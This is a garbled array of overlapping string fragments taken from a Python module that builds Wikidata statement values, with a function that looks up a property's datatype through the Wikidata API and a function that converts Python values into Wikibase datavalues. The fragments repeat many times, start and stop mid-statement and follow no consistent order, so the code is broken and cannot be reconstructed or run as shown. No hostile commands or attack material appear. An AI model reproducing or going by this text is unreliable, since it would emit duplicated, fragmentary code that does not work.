valueObj", "NotImplementedError(f\"Datatype {datatype} not implemented\") def buildSnak(propertyId: str, value): datatype = getPropertyType(propertyId) datavalue =", "[ \"wikibase-lexeme\", \"wikibase-form\", \"wikibase-sense\", \"wikibase-item\", \"wikibase-property\", ]: if type(value) == dict: return {\"value\":", "repo = WikidataSession() query = { \"action\": \"query\", \"format\": \"json\", \"prop\": \"revisions\", \"titles\":", "\"query\", \"format\": \"json\", \"prop\": \"revisions\", \"titles\": \"Property:\" + propertyId, \"rvprop\": \"content\", } DATA", "value, \"type\": \"globecoordinate\"} else: raise TypeError( f\"Can not convert type {type(value)} to datatype", "{type(value)} to datatype {datatype}\" ) else: raise NotImplementedError(f\"Datatype {datatype} not implemented\") def buildSnak(propertyId:", "convert type {type(value)} to datatype {datatype}\" ) else: raise NotImplementedError(f\"Datatype {datatype} not implemented\")", "value, \"type\": \"string\"} elif type(value) == str: return {\"value\": {\"value\": value}, \"type\": \"string\"}", "def buildSnak(propertyId: str, value): datatype = getPropertyType(propertyId) datavalue = buildDataValue(datatype, value) return {", "} DATA = repo.get(query) jsonstr = list(DATA[\"query\"][\"pages\"].values())[0][\"revisions\"][0][\"*\"] content = json.loads(jsonstr) return content[\"datatype\"] def", "datatype[9:], \"id\": value} return {\"value\": value, \"type\": \"wikibase-entity\"} else: raise TypeError( f\"Can not", "{type(value)} to datatype {datatype}\" ) elif datatype in [ \"string\", \"tabular-data\", \"geo-shape\", \"url\",", "datatype {datatype}\" ) elif datatype == \"time\": if type(value) == dict: return {\"value\":", "import Any, Dict from .wikidatasession import WikidataSession @functools.lru_cache() def getPropertyType(propertyId: str): repo =", "datatype {datatype}\" ) elif datatype in [ \"string\", \"tabular-data\", \"geo-shape\", \"url\", \"musical-notation\", \"math\",", "{\"value\": valueObj, \"type\": \"time\"} else: raise TypeError( f\"Can not convert type {type(value)} to", "\"titles\": \"Property:\" + propertyId, \"rvprop\": \"content\", } DATA = repo.get(query) jsonstr = list(DATA[\"query\"][\"pages\"].values())[0][\"revisions\"][0][\"*\"]", "0, \"before\": 0, \"after\": 0, \"precision\": 11, \"calendarmodel\": \"http://www.wikidata.org/entity/Q1985727\", } return {\"value\": valueObj,", "{datatype}\" ) elif datatype == \"globe-coordinate\": if type(value) == dict: return {\"value\": value,", "datavalue = buildDataValue(datatype, value) return { \"snaktype\": \"value\", \"property\": propertyId, \"datavalue\": datavalue, \"datatype\":", "\"string\", \"tabular-data\", \"geo-shape\", \"url\", \"musical-notation\", \"math\", \"commonsMedia\", ]: if type(value) == dict: return", "\"content\", } DATA = repo.get(query) jsonstr = list(DATA[\"query\"][\"pages\"].values())[0][\"revisions\"][0][\"*\"] content = json.loads(jsonstr) return content[\"datatype\"]", "not convert type {type(value)} to datatype {datatype}\" ) else: raise NotImplementedError(f\"Datatype {datatype} not", ".wikidatasession import WikidataSession @functools.lru_cache() def getPropertyType(propertyId: str): repo = WikidataSession() query = {", "to datatype {datatype}\" ) elif datatype in [ \"string\", \"tabular-data\", \"geo-shape\", \"url\", \"musical-notation\",", "if type(value) == dict: return {\"value\": value, \"type\": \"wikibase-entity\"} elif type(value) == str:", "\"rvprop\": \"content\", } DATA = repo.get(query) jsonstr = list(DATA[\"query\"][\"pages\"].values())[0][\"revisions\"][0][\"*\"] content = json.loads(jsonstr) return", "]: if type(value) == dict: return {\"value\": value, \"type\": \"string\"} elif type(value) ==", "if type(value) == dict: return {\"value\": value, \"type\": \"quantity\"} if type(value) in [int,", "type(value) == dict: return {\"value\": value, \"type\": \"wikibase-entity\"} elif type(value) == str: value", "f\"Can not convert type {type(value)} to datatype {datatype}\" ) elif datatype == \"globe-coordinate\":", "\"quantity\": if type(value) == dict: return {\"value\": value, \"type\": \"quantity\"} if type(value) in", "\"wikibase-entity\"} elif type(value) == str: value = {\"entity-type\": datatype[9:], \"id\": value} return {\"value\":", "WikidataSession() query = { \"action\": \"query\", \"format\": \"json\", \"prop\": \"revisions\", \"titles\": \"Property:\" +", "return {\"value\": value, \"type\": \"monolingualtext\"} else: raise TypeError( f\"Can not convert type {type(value)}", "functools import json from datetime import datetime from typing import Any, Dict from", "buildDataValue(datatype: str, value): if datatype in [ \"wikibase-lexeme\", \"wikibase-form\", \"wikibase-sense\", \"wikibase-item\", \"wikibase-property\", ]:", "type(value) in [int, float]: valueObj = { \"amount\": \"%+f\" % value, \"unit\": \"1\",", "\"type\": \"monolingualtext\"} else: raise TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\"", "datatype in [ \"wikibase-lexeme\", \"wikibase-form\", \"wikibase-sense\", \"wikibase-item\", \"wikibase-property\", ]: if type(value) == dict:", "if type(value) == dict: return {\"value\": value, \"type\": \"string\"} elif type(value) == str:", "\"prop\": \"revisions\", \"titles\": \"Property:\" + propertyId, \"rvprop\": \"content\", } DATA = repo.get(query) jsonstr", "TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\" ) elif datatype ==", "== dict: return {\"value\": value, \"type\": \"monolingualtext\"} else: raise TypeError( f\"Can not convert", "Dict from .wikidatasession import WikidataSession @functools.lru_cache() def getPropertyType(propertyId: str): repo = WikidataSession() query", "} return {\"value\": valueObj, \"type\": \"time\"} else: raise TypeError( f\"Can not convert type", "minute=0, second=0, microsecond=0) valueObj: Dict[str, Any] = { \"time\": \"+\" + cleanedDateTime.isoformat() +", ") elif datatype == \"monolingualtext\": if type(value) == dict: return {\"value\": value, \"type\":", "elif datatype == \"monolingualtext\": if type(value) == dict: return {\"value\": value, \"type\": \"monolingualtext\"}", "dict: return {\"value\": value, \"type\": \"string\"} elif type(value) == str: return {\"value\": {\"value\":", "getPropertyType(propertyId: str): repo = WikidataSession() query = { \"action\": \"query\", \"format\": \"json\", \"prop\":", "cleanedDateTime.isoformat() + \"Z\", \"timezone\": 0, \"before\": 0, \"after\": 0, \"precision\": 11, \"calendarmodel\": \"http://www.wikidata.org/entity/Q1985727\",", "import WikidataSession @functools.lru_cache() def getPropertyType(propertyId: str): repo = WikidataSession() query = { \"action\":", "= {\"entity-type\": datatype[9:], \"id\": value} return {\"value\": value, \"type\": \"wikibase-entity\"} else: raise TypeError(", "type {type(value)} to datatype {datatype}\" ) elif datatype == \"monolingualtext\": if type(value) ==", "0, \"precision\": 11, \"calendarmodel\": \"http://www.wikidata.org/entity/Q1985727\", } return {\"value\": valueObj, \"type\": \"time\"} else: raise", "import json from datetime import datetime from typing import Any, Dict from .wikidatasession", "import datetime from typing import Any, Dict from .wikidatasession import WikidataSession @functools.lru_cache() def", "if type(value) == datetime: cleanedDateTime = value.replace(hour=0, minute=0, second=0, microsecond=0) valueObj: Dict[str, Any]", "{\"value\": value, \"type\": \"monolingualtext\"} else: raise TypeError( f\"Can not convert type {type(value)} to", "not convert type {type(value)} to datatype {datatype}\" ) elif datatype == \"time\": if", "f\"Can not convert type {type(value)} to datatype {datatype}\" ) elif datatype == \"quantity\":", "datetime: cleanedDateTime = value.replace(hour=0, minute=0, second=0, microsecond=0) valueObj: Dict[str, Any] = { \"time\":", "== str: return {\"value\": {\"value\": value}, \"type\": \"string\"} else: raise TypeError( f\"Can not", "valueObj = { \"amount\": \"%+f\" % value, \"unit\": \"1\", } return {\"value\": valueObj,", "datatype {datatype}\" ) else: raise NotImplementedError(f\"Datatype {datatype} not implemented\") def buildSnak(propertyId: str, value):", "+ propertyId, \"rvprop\": \"content\", } DATA = repo.get(query) jsonstr = list(DATA[\"query\"][\"pages\"].values())[0][\"revisions\"][0][\"*\"] content =", "= { \"amount\": \"%+f\" % value, \"unit\": \"1\", } return {\"value\": valueObj, \"type\":", "if type(value) == dict: return {\"value\": value, \"type\": \"time\"} if type(value) == datetime:", "value, \"type\": \"monolingualtext\"} else: raise TypeError( f\"Can not convert type {type(value)} to datatype", ") elif datatype == \"globe-coordinate\": if type(value) == dict: return {\"value\": value, \"type\":", "json from datetime import datetime from typing import Any, Dict from .wikidatasession import", "= list(DATA[\"query\"][\"pages\"].values())[0][\"revisions\"][0][\"*\"] content = json.loads(jsonstr) return content[\"datatype\"] def buildDataValue(datatype: str, value): if datatype", "== str: value = {\"entity-type\": datatype[9:], \"id\": value} return {\"value\": value, \"type\": \"wikibase-entity\"}", "\"monolingualtext\"} else: raise TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\" )", "f\"Can not convert type {type(value)} to datatype {datatype}\" ) elif datatype == \"time\":", "11, \"calendarmodel\": \"http://www.wikidata.org/entity/Q1985727\", } return {\"value\": valueObj, \"type\": \"time\"} else: raise TypeError( f\"Can", "{datatype}\" ) else: raise NotImplementedError(f\"Datatype {datatype} not implemented\") def buildSnak(propertyId: str, value): datatype", "in [ \"wikibase-lexeme\", \"wikibase-form\", \"wikibase-sense\", \"wikibase-item\", \"wikibase-property\", ]: if type(value) == dict: return", "\"monolingualtext\": if type(value) == dict: return {\"value\": value, \"type\": \"monolingualtext\"} else: raise TypeError(", "{ \"time\": \"+\" + cleanedDateTime.isoformat() + \"Z\", \"timezone\": 0, \"before\": 0, \"after\": 0,", "value, \"type\": \"wikibase-entity\"} elif type(value) == str: value = {\"entity-type\": datatype[9:], \"id\": value}", "== \"globe-coordinate\": if type(value) == dict: return {\"value\": value, \"type\": \"globecoordinate\"} else: raise", "\"Z\", \"timezone\": 0, \"before\": 0, \"after\": 0, \"precision\": 11, \"calendarmodel\": \"http://www.wikidata.org/entity/Q1985727\", } return", "type(value) == dict: return {\"value\": value, \"type\": \"globecoordinate\"} else: raise TypeError( f\"Can not", "return {\"value\": value, \"type\": \"time\"} if type(value) == datetime: cleanedDateTime = value.replace(hour=0, minute=0,", "\"globecoordinate\"} else: raise TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\" )", "value, \"type\": \"time\"} if type(value) == datetime: cleanedDateTime = value.replace(hour=0, minute=0, second=0, microsecond=0)", "== datetime: cleanedDateTime = value.replace(hour=0, minute=0, second=0, microsecond=0) valueObj: Dict[str, Any] = {", "repo.get(query) jsonstr = list(DATA[\"query\"][\"pages\"].values())[0][\"revisions\"][0][\"*\"] content = json.loads(jsonstr) return content[\"datatype\"] def buildDataValue(datatype: str, value):", "cleanedDateTime = value.replace(hour=0, minute=0, second=0, microsecond=0) valueObj: Dict[str, Any] = { \"time\": \"+\"", "if datatype in [ \"wikibase-lexeme\", \"wikibase-form\", \"wikibase-sense\", \"wikibase-item\", \"wikibase-property\", ]: if type(value) ==", "{ \"action\": \"query\", \"format\": \"json\", \"prop\": \"revisions\", \"titles\": \"Property:\" + propertyId, \"rvprop\": \"content\",", "0, \"after\": 0, \"precision\": 11, \"calendarmodel\": \"http://www.wikidata.org/entity/Q1985727\", } return {\"value\": valueObj, \"type\": \"time\"}", "str, value): if datatype in [ \"wikibase-lexeme\", \"wikibase-form\", \"wikibase-sense\", \"wikibase-item\", \"wikibase-property\", ]: if", "{\"value\": value}, \"type\": \"string\"} else: raise TypeError( f\"Can not convert type {type(value)} to", "query = { \"action\": \"query\", \"format\": \"json\", \"prop\": \"revisions\", \"titles\": \"Property:\" + propertyId,", "\"http://www.wikidata.org/entity/Q1985727\", } return {\"value\": valueObj, \"type\": \"time\"} else: raise TypeError( f\"Can not convert", "else: raise TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\" ) else:", "\"after\": 0, \"precision\": 11, \"calendarmodel\": \"http://www.wikidata.org/entity/Q1985727\", } return {\"value\": valueObj, \"type\": \"time\"} else:", "{\"value\": {\"value\": value}, \"type\": \"string\"} else: raise TypeError( f\"Can not convert type {type(value)}", "{\"value\": value, \"type\": \"globecoordinate\"} else: raise TypeError( f\"Can not convert type {type(value)} to", "\"timezone\": 0, \"before\": 0, \"after\": 0, \"precision\": 11, \"calendarmodel\": \"http://www.wikidata.org/entity/Q1985727\", } return {\"value\":", "not convert type {type(value)} to datatype {datatype}\" ) elif datatype == \"globe-coordinate\": if", "\"1\", } return {\"value\": valueObj, \"type\": \"time\"} else: raise TypeError( f\"Can not convert", "in [ \"string\", \"tabular-data\", \"geo-shape\", \"url\", \"musical-notation\", \"math\", \"commonsMedia\", ]: if type(value) ==", "{datatype}\" ) elif datatype == \"time\": if type(value) == dict: return {\"value\": value,", "dict: return {\"value\": value, \"type\": \"wikibase-entity\"} elif type(value) == str: value = {\"entity-type\":", "dict: return {\"value\": value, \"type\": \"globecoordinate\"} else: raise TypeError( f\"Can not convert type", "return {\"value\": value, \"type\": \"globecoordinate\"} else: raise TypeError( f\"Can not convert type {type(value)}", "value): datatype = getPropertyType(propertyId) datavalue = buildDataValue(datatype, value) return { \"snaktype\": \"value\", \"property\":", "elif datatype == \"time\": if type(value) == dict: return {\"value\": value, \"type\": \"time\"}", "datatype == \"time\": if type(value) == dict: return {\"value\": value, \"type\": \"time\"} if", "value.replace(hour=0, minute=0, second=0, microsecond=0) valueObj: Dict[str, Any] = { \"time\": \"+\" + cleanedDateTime.isoformat()", "f\"Can not convert type {type(value)} to datatype {datatype}\" ) elif datatype == \"monolingualtext\":", "= repo.get(query) jsonstr = list(DATA[\"query\"][\"pages\"].values())[0][\"revisions\"][0][\"*\"] content = json.loads(jsonstr) return content[\"datatype\"] def buildDataValue(datatype: str,", "convert type {type(value)} to datatype {datatype}\" ) elif datatype in [ \"string\", \"tabular-data\",", "implemented\") def buildSnak(propertyId: str, value): datatype = getPropertyType(propertyId) datavalue = buildDataValue(datatype, value) return", "value, \"type\": \"quantity\"} if type(value) in [int, float]: valueObj = { \"amount\": \"%+f\"", "second=0, microsecond=0) valueObj: Dict[str, Any] = { \"time\": \"+\" + cleanedDateTime.isoformat() + \"Z\",", "= value.replace(hour=0, minute=0, second=0, microsecond=0) valueObj: Dict[str, Any] = { \"time\": \"+\" +", "= WikidataSession() query = { \"action\": \"query\", \"format\": \"json\", \"prop\": \"revisions\", \"titles\": \"Property:\"", "valueObj: Dict[str, Any] = { \"time\": \"+\" + cleanedDateTime.isoformat() + \"Z\", \"timezone\": 0,", "{datatype} not implemented\") def buildSnak(propertyId: str, value): datatype = getPropertyType(propertyId) datavalue = buildDataValue(datatype,", "datatype = getPropertyType(propertyId) datavalue = buildDataValue(datatype, value) return { \"snaktype\": \"value\", \"property\": propertyId,", "return {\"value\": value, \"type\": \"wikibase-entity\"} else: raise TypeError( f\"Can not convert type {type(value)}", "\"type\": \"globecoordinate\"} else: raise TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\"", "\"globe-coordinate\": if type(value) == dict: return {\"value\": value, \"type\": \"globecoordinate\"} else: raise TypeError(", "[int, float]: valueObj = { \"amount\": \"%+f\" % value, \"unit\": \"1\", } return", "list(DATA[\"query\"][\"pages\"].values())[0][\"revisions\"][0][\"*\"] content = json.loads(jsonstr) return content[\"datatype\"] def buildDataValue(datatype: str, value): if datatype in", "% value, \"unit\": \"1\", } return {\"value\": valueObj, \"type\": \"time\"} else: raise TypeError(", "\"type\": \"quantity\"} if type(value) in [int, float]: valueObj = { \"amount\": \"%+f\" %", "value): if datatype in [ \"wikibase-lexeme\", \"wikibase-form\", \"wikibase-sense\", \"wikibase-item\", \"wikibase-property\", ]: if type(value)", "convert type {type(value)} to datatype {datatype}\" ) elif datatype == \"globe-coordinate\": if type(value)", "\"type\": \"string\"} elif type(value) == str: return {\"value\": {\"value\": value}, \"type\": \"string\"} else:", "str): repo = WikidataSession() query = { \"action\": \"query\", \"format\": \"json\", \"prop\": \"revisions\",", "\"time\"} else: raise TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\" )", "type(value) == datetime: cleanedDateTime = value.replace(hour=0, minute=0, second=0, microsecond=0) valueObj: Dict[str, Any] =", "= buildDataValue(datatype, value) return { \"snaktype\": \"value\", \"property\": propertyId, \"datavalue\": datavalue, \"datatype\": datatype,", "elif datatype == \"quantity\": if type(value) == dict: return {\"value\": value, \"type\": \"quantity\"}", "\"type\": \"string\"} else: raise TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\"", "TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\" ) else: raise NotImplementedError(f\"Datatype", "\"wikibase-item\", \"wikibase-property\", ]: if type(value) == dict: return {\"value\": value, \"type\": \"wikibase-entity\"} elif", "Dict[str, Any] = { \"time\": \"+\" + cleanedDateTime.isoformat() + \"Z\", \"timezone\": 0, \"before\":", "{\"value\": value, \"type\": \"string\"} elif type(value) == str: return {\"value\": {\"value\": value}, \"type\":", ") elif datatype in [ \"string\", \"tabular-data\", \"geo-shape\", \"url\", \"musical-notation\", \"math\", \"commonsMedia\", ]:", "buildDataValue(datatype, value) return { \"snaktype\": \"value\", \"property\": propertyId, \"datavalue\": datavalue, \"datatype\": datatype, }", "if type(value) == dict: return {\"value\": value, \"type\": \"globecoordinate\"} else: raise TypeError( f\"Can", "datatype == \"monolingualtext\": if type(value) == dict: return {\"value\": value, \"type\": \"monolingualtext\"} else:", "return {\"value\": value, \"type\": \"string\"} elif type(value) == str: return {\"value\": {\"value\": value},", "microsecond=0) valueObj: Dict[str, Any] = { \"time\": \"+\" + cleanedDateTime.isoformat() + \"Z\", \"timezone\":", "Any] = { \"time\": \"+\" + cleanedDateTime.isoformat() + \"Z\", \"timezone\": 0, \"before\": 0,", "== \"quantity\": if type(value) == dict: return {\"value\": value, \"type\": \"quantity\"} if type(value)", "to datatype {datatype}\" ) else: raise NotImplementedError(f\"Datatype {datatype} not implemented\") def buildSnak(propertyId: str,", "== \"time\": if type(value) == dict: return {\"value\": value, \"type\": \"time\"} if type(value)", "\"string\"} elif type(value) == str: return {\"value\": {\"value\": value}, \"type\": \"string\"} else: raise", "== \"monolingualtext\": if type(value) == dict: return {\"value\": value, \"type\": \"monolingualtext\"} else: raise", "datatype {datatype}\" ) elif datatype == \"globe-coordinate\": if type(value) == dict: return {\"value\":", "value, \"type\": \"wikibase-entity\"} else: raise TypeError( f\"Can not convert type {type(value)} to datatype", "= { \"time\": \"+\" + cleanedDateTime.isoformat() + \"Z\", \"timezone\": 0, \"before\": 0, \"after\":", "{\"value\": value, \"type\": \"time\"} if type(value) == datetime: cleanedDateTime = value.replace(hour=0, minute=0, second=0,", "== dict: return {\"value\": value, \"type\": \"string\"} elif type(value) == str: return {\"value\":", "\"url\", \"musical-notation\", \"math\", \"commonsMedia\", ]: if type(value) == dict: return {\"value\": value, \"type\":", "str, value): datatype = getPropertyType(propertyId) datavalue = buildDataValue(datatype, value) return { \"snaktype\": \"value\",", "getPropertyType(propertyId) datavalue = buildDataValue(datatype, value) return { \"snaktype\": \"value\", \"property\": propertyId, \"datavalue\": datavalue,", "\"wikibase-sense\", \"wikibase-item\", \"wikibase-property\", ]: if type(value) == dict: return {\"value\": value, \"type\": \"wikibase-entity\"}", "{type(value)} to datatype {datatype}\" ) elif datatype == \"quantity\": if type(value) == dict:", "value, \"unit\": \"1\", } return {\"value\": valueObj, \"type\": \"time\"} else: raise TypeError( f\"Can", "{datatype}\" ) elif datatype in [ \"string\", \"tabular-data\", \"geo-shape\", \"url\", \"musical-notation\", \"math\", \"commonsMedia\",", "if type(value) == dict: return {\"value\": value, \"type\": \"monolingualtext\"} else: raise TypeError( f\"Can", "valueObj, \"type\": \"time\"} else: raise TypeError( f\"Can not convert type {type(value)} to datatype", "dict: return {\"value\": value, \"type\": \"monolingualtext\"} else: raise TypeError( f\"Can not convert type", "not implemented\") def buildSnak(propertyId: str, value): datatype = getPropertyType(propertyId) datavalue = buildDataValue(datatype, value)", "\"id\": value} return {\"value\": value, \"type\": \"wikibase-entity\"} else: raise TypeError( f\"Can not convert", "[ \"string\", \"tabular-data\", \"geo-shape\", \"url\", \"musical-notation\", \"math\", \"commonsMedia\", ]: if type(value) == dict:", "elif type(value) == str: return {\"value\": {\"value\": value}, \"type\": \"string\"} else: raise TypeError(", "dict: return {\"value\": value, \"type\": \"time\"} if type(value) == datetime: cleanedDateTime = value.replace(hour=0,", "type(value) == dict: return {\"value\": value, \"type\": \"quantity\"} if type(value) in [int, float]:", ") elif datatype == \"time\": if type(value) == dict: return {\"value\": value, \"type\":", "= getPropertyType(propertyId) datavalue = buildDataValue(datatype, value) return { \"snaktype\": \"value\", \"property\": propertyId, \"datavalue\":", "jsonstr = list(DATA[\"query\"][\"pages\"].values())[0][\"revisions\"][0][\"*\"] content = json.loads(jsonstr) return content[\"datatype\"] def buildDataValue(datatype: str, value): if", "convert type {type(value)} to datatype {datatype}\" ) elif datatype == \"monolingualtext\": if type(value)", "to datatype {datatype}\" ) elif datatype == \"globe-coordinate\": if type(value) == dict: return", "\"%+f\" % value, \"unit\": \"1\", } return {\"value\": valueObj, \"type\": \"time\"} else: raise", "type {type(value)} to datatype {datatype}\" ) else: raise NotImplementedError(f\"Datatype {datatype} not implemented\") def", "type {type(value)} to datatype {datatype}\" ) elif datatype in [ \"string\", \"tabular-data\", \"geo-shape\",", "convert type {type(value)} to datatype {datatype}\" ) elif datatype == \"time\": if type(value)", "\"wikibase-form\", \"wikibase-sense\", \"wikibase-item\", \"wikibase-property\", ]: if type(value) == dict: return {\"value\": value, \"type\":", "elif type(value) == str: value = {\"entity-type\": datatype[9:], \"id\": value} return {\"value\": value,", "+ \"Z\", \"timezone\": 0, \"before\": 0, \"after\": 0, \"precision\": 11, \"calendarmodel\": \"http://www.wikidata.org/entity/Q1985727\", }", "\"geo-shape\", \"url\", \"musical-notation\", \"math\", \"commonsMedia\", ]: if type(value) == dict: return {\"value\": value,", "\"unit\": \"1\", } return {\"value\": valueObj, \"type\": \"time\"} else: raise TypeError( f\"Can not", "\"type\": \"time\"} else: raise TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\"", "TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\" ) elif datatype in", "from datetime import datetime from typing import Any, Dict from .wikidatasession import WikidataSession", "]: if type(value) == dict: return {\"value\": value, \"type\": \"wikibase-entity\"} elif type(value) ==", "f\"Can not convert type {type(value)} to datatype {datatype}\" ) else: raise NotImplementedError(f\"Datatype {datatype}", "{type(value)} to datatype {datatype}\" ) elif datatype == \"monolingualtext\": if type(value) == dict:", "json.loads(jsonstr) return content[\"datatype\"] def buildDataValue(datatype: str, value): if datatype in [ \"wikibase-lexeme\", \"wikibase-form\",", "in [int, float]: valueObj = { \"amount\": \"%+f\" % value, \"unit\": \"1\", }", "def buildDataValue(datatype: str, value): if datatype in [ \"wikibase-lexeme\", \"wikibase-form\", \"wikibase-sense\", \"wikibase-item\", \"wikibase-property\",", "raise TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\" ) else: raise", "{\"value\": value, \"type\": \"wikibase-entity\"} elif type(value) == str: value = {\"entity-type\": datatype[9:], \"id\":", "{\"entity-type\": datatype[9:], \"id\": value} return {\"value\": value, \"type\": \"wikibase-entity\"} else: raise TypeError( f\"Can", "{type(value)} to datatype {datatype}\" ) elif datatype == \"time\": if type(value) == dict:", "datatype == \"globe-coordinate\": if type(value) == dict: return {\"value\": value, \"type\": \"globecoordinate\"} else:", "= { \"action\": \"query\", \"format\": \"json\", \"prop\": \"revisions\", \"titles\": \"Property:\" + propertyId, \"rvprop\":", "value = {\"entity-type\": datatype[9:], \"id\": value} return {\"value\": value, \"type\": \"wikibase-entity\"} else: raise", "datetime from typing import Any, Dict from .wikidatasession import WikidataSession @functools.lru_cache() def getPropertyType(propertyId:", "\"commonsMedia\", ]: if type(value) == dict: return {\"value\": value, \"type\": \"string\"} elif type(value)", "value} return {\"value\": value, \"type\": \"wikibase-entity\"} else: raise TypeError( f\"Can not convert type", "{datatype}\" ) elif datatype == \"monolingualtext\": if type(value) == dict: return {\"value\": value,", "return {\"value\": valueObj, \"type\": \"time\"} else: raise TypeError( f\"Can not convert type {type(value)}", "\"type\": \"wikibase-entity\"} elif type(value) == str: value = {\"entity-type\": datatype[9:], \"id\": value} return", "{ \"amount\": \"%+f\" % value, \"unit\": \"1\", } return {\"value\": valueObj, \"type\": \"time\"}", "return {\"value\": value, \"type\": \"wikibase-entity\"} elif type(value) == str: value = {\"entity-type\": datatype[9:],", "DATA = repo.get(query) jsonstr = list(DATA[\"query\"][\"pages\"].values())[0][\"revisions\"][0][\"*\"] content = json.loads(jsonstr) return content[\"datatype\"] def buildDataValue(datatype:", "raise TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\" ) elif datatype", "datatype in [ \"string\", \"tabular-data\", \"geo-shape\", \"url\", \"musical-notation\", \"math\", \"commonsMedia\", ]: if type(value)", "convert type {type(value)} to datatype {datatype}\" ) elif datatype == \"quantity\": if type(value)", "@functools.lru_cache() def getPropertyType(propertyId: str): repo = WikidataSession() query = { \"action\": \"query\", \"format\":", "type(value) == dict: return {\"value\": value, \"type\": \"monolingualtext\"} else: raise TypeError( f\"Can not", "+ cleanedDateTime.isoformat() + \"Z\", \"timezone\": 0, \"before\": 0, \"after\": 0, \"precision\": 11, \"calendarmodel\":", "import functools import json from datetime import datetime from typing import Any, Dict", "\"json\", \"prop\": \"revisions\", \"titles\": \"Property:\" + propertyId, \"rvprop\": \"content\", } DATA = repo.get(query)", "str: return {\"value\": {\"value\": value}, \"type\": \"string\"} else: raise TypeError( f\"Can not convert", "\"wikibase-entity\"} else: raise TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\" )", "return {\"value\": value, \"type\": \"quantity\"} if type(value) in [int, float]: valueObj = {", "WikidataSession @functools.lru_cache() def getPropertyType(propertyId: str): repo = WikidataSession() query = { \"action\": \"query\",", "\"quantity\"} if type(value) in [int, float]: valueObj = { \"amount\": \"%+f\" % value,", "f\"Can not convert type {type(value)} to datatype {datatype}\" ) elif datatype in [", "{datatype}\" ) elif datatype == \"quantity\": if type(value) == dict: return {\"value\": value,", "from .wikidatasession import WikidataSession @functools.lru_cache() def getPropertyType(propertyId: str): repo = WikidataSession() query =", "else: raise TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\" ) elif", "{\"value\": value, \"type\": \"wikibase-entity\"} else: raise TypeError( f\"Can not convert type {type(value)} to", "\"revisions\", \"titles\": \"Property:\" + propertyId, \"rvprop\": \"content\", } DATA = repo.get(query) jsonstr =", "elif datatype == \"globe-coordinate\": if type(value) == dict: return {\"value\": value, \"type\": \"globecoordinate\"}", "dict: return {\"value\": value, \"type\": \"quantity\"} if type(value) in [int, float]: valueObj =", "return content[\"datatype\"] def buildDataValue(datatype: str, value): if datatype in [ \"wikibase-lexeme\", \"wikibase-form\", \"wikibase-sense\",", "\"amount\": \"%+f\" % value, \"unit\": \"1\", } return {\"value\": valueObj, \"type\": \"time\"} else:", "def getPropertyType(propertyId: str): repo = WikidataSession() query = { \"action\": \"query\", \"format\": \"json\",", "type {type(value)} to datatype {datatype}\" ) elif datatype == \"globe-coordinate\": if type(value) ==", "\"format\": \"json\", \"prop\": \"revisions\", \"titles\": \"Property:\" + propertyId, \"rvprop\": \"content\", } DATA =", "== dict: return {\"value\": value, \"type\": \"globecoordinate\"} else: raise TypeError( f\"Can not convert", ") elif datatype == \"quantity\": if type(value) == dict: return {\"value\": value, \"type\":", "\"time\"} if type(value) == datetime: cleanedDateTime = value.replace(hour=0, minute=0, second=0, microsecond=0) valueObj: Dict[str,", "\"time\": if type(value) == dict: return {\"value\": value, \"type\": \"time\"} if type(value) ==", "\"before\": 0, \"after\": 0, \"precision\": 11, \"calendarmodel\": \"http://www.wikidata.org/entity/Q1985727\", } return {\"value\": valueObj, \"type\":", "not convert type {type(value)} to datatype {datatype}\" ) elif datatype in [ \"string\",", "\"+\" + cleanedDateTime.isoformat() + \"Z\", \"timezone\": 0, \"before\": 0, \"after\": 0, \"precision\": 11,", "\"time\": \"+\" + cleanedDateTime.isoformat() + \"Z\", \"timezone\": 0, \"before\": 0, \"after\": 0, \"precision\":", "\"calendarmodel\": \"http://www.wikidata.org/entity/Q1985727\", } return {\"value\": valueObj, \"type\": \"time\"} else: raise TypeError( f\"Can not", "type(value) == dict: return {\"value\": value, \"type\": \"string\"} elif type(value) == str: return", "datatype {datatype}\" ) elif datatype == \"quantity\": if type(value) == dict: return {\"value\":", "type(value) == str: value = {\"entity-type\": datatype[9:], \"id\": value} return {\"value\": value, \"type\":", "not convert type {type(value)} to datatype {datatype}\" ) elif datatype == \"quantity\": if", "raise NotImplementedError(f\"Datatype {datatype} not implemented\") def buildSnak(propertyId: str, value): datatype = getPropertyType(propertyId) datavalue", "Any, Dict from .wikidatasession import WikidataSession @functools.lru_cache() def getPropertyType(propertyId: str): repo = WikidataSession()", "elif datatype in [ \"string\", \"tabular-data\", \"geo-shape\", \"url\", \"musical-notation\", \"math\", \"commonsMedia\", ]: if", "return {\"value\": {\"value\": value}, \"type\": \"string\"} else: raise TypeError( f\"Can not convert type", "to datatype {datatype}\" ) elif datatype == \"monolingualtext\": if type(value) == dict: return", "content = json.loads(jsonstr) return content[\"datatype\"] def buildDataValue(datatype: str, value): if datatype in [", "content[\"datatype\"] def buildDataValue(datatype: str, value): if datatype in [ \"wikibase-lexeme\", \"wikibase-form\", \"wikibase-sense\", \"wikibase-item\",", "{\"value\": value, \"type\": \"quantity\"} if type(value) in [int, float]: valueObj = { \"amount\":", "buildSnak(propertyId: str, value): datatype = getPropertyType(propertyId) datavalue = buildDataValue(datatype, value) return { \"snaktype\":", "== dict: return {\"value\": value, \"type\": \"wikibase-entity\"} elif type(value) == str: value =", "type {type(value)} to datatype {datatype}\" ) elif datatype == \"quantity\": if type(value) ==", "datatype {datatype}\" ) elif datatype == \"monolingualtext\": if type(value) == dict: return {\"value\":", "\"type\": \"wikibase-entity\"} else: raise TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\"", "datatype == \"quantity\": if type(value) == dict: return {\"value\": value, \"type\": \"quantity\"} if" ]
